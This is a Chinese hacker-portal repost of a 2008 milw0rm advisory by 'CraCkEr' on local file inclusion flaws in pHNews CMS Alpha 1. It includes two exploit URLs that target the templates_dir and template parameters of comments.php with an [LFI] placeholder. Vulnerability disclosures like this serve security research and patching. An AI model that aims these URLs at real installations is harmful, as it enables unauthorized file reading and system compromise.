pHNews CMS Multiple Local File Inclusion Vulnerabilities - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

免费服务	我要发布	在线破解	黑客游戏	精华收集	免费空间	网络硬盘	独家报道	黑器点播	免费 FTP	交换资源
收费服务	黑客培训	光盘刻录	黑客书籍	视频下载	主力频道	空间域名	网站建设	特色服务	解决方案	我要投诉

您现在的位置：华夏黑客同盟 >> 漏洞 >> web apps >> 正文

用户登录

新用户注册

多个本地文件包含漏洞

荐 ★★★

【字体：小大】

pHNews CMS Multiple Local File Inclusion Vulnerabilities

作者：milw0rm 文章来源：milw0rm 点击数：更新时间：2008-7-5

┌┌───────────────────────────────────────────────────────────────────────────┐
││                             C r a C k E r                                ┌┘
┌┘          T H E   C R A C K   O F   E T E R N A L   M I G H T             ││
└───────────────────────────────────────────────────────────────────────────┘┘

┌────      From The Ashes and Dust Rises An Unimaginable crack....      ────┐
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                          [ Local File Include ]                          ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
:   Author   : CraCkEr                : :                                    :
│   Group    : uNiTeD CraCkiNg ForCE │ │                                    │
│   Script   : pHNews CMS Alpha 1     │ │         Register Globals :         │
│   Download : SourceForge.net        │ │                                    │
│   Method   : GET                    │ │          [█] ON   [ ] OFF          │
│   Critical : High [░░▒▒▓▓██]        │ │                                    │
│   Impact   : System access          │ │                                    │
│ ────────────────────────────────────┘ └─────────────────────────────────── │
│                              DALnet #crackers                             ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
:                                                                            :
│ Release Notes:                                                            │
│ ═════════════                                                             │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise.                                                        │
│                                                                            │

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                             Exploit URL's                                ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘

http://localhost/path/modules/comments.php?templates_dir=[LFI]

http://localhost/path/modules/comments.php?template=[LFI]

└────────────────────────────────────────────────────────────────────────────┘

Greets:
       The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                              © CraCkEr 2008                              ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘

# milw0rm.com

责任编辑：朱倩　　联系方式　Email：朱倩

电话：51228163

上一篇漏洞：本地文件中列入的脆弱性

下一篇漏洞： MySQL 0.2版SQL注入漏洞

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913